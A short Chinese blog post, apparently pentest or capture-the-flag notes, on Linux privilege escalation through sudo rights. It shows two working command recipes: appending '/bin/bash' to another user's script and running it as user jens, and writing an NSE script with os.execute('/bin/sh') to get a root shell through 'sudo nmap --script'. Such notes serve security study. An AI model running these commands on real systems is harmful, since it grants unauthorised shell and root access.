利用可执行操作的脚本或工具提权

查看当前用户可执行操作：sudo -l
1.如果是可执行另外一个用户下面的一个脚本，那么可以利用这个脚本来获取到那个用户的shell
例如：

那么执行

echo "/bin/bash" >> backups.sh  #获取shell
sudo -u jens ./backups.sh   #利用jens用户自己来执行

即可切换至jens用户的shell，如果是root下面的话也是如此。

2.如果是可执行root用户下面的nmap的话，那么利用nmap脚本来执行弹shell的命令即可获取到root用户的shell。
例如：

利用：

echo 'os.execute("/bin/sh")' > getShell
sudo nmap --script=getShell

即可提权到root

posted @ 2019-12-18 16:22 ctrl_TT豆阅读(549) 评论(0) 编辑收藏举报

刷新页面返回顶部

ctrl_TT豆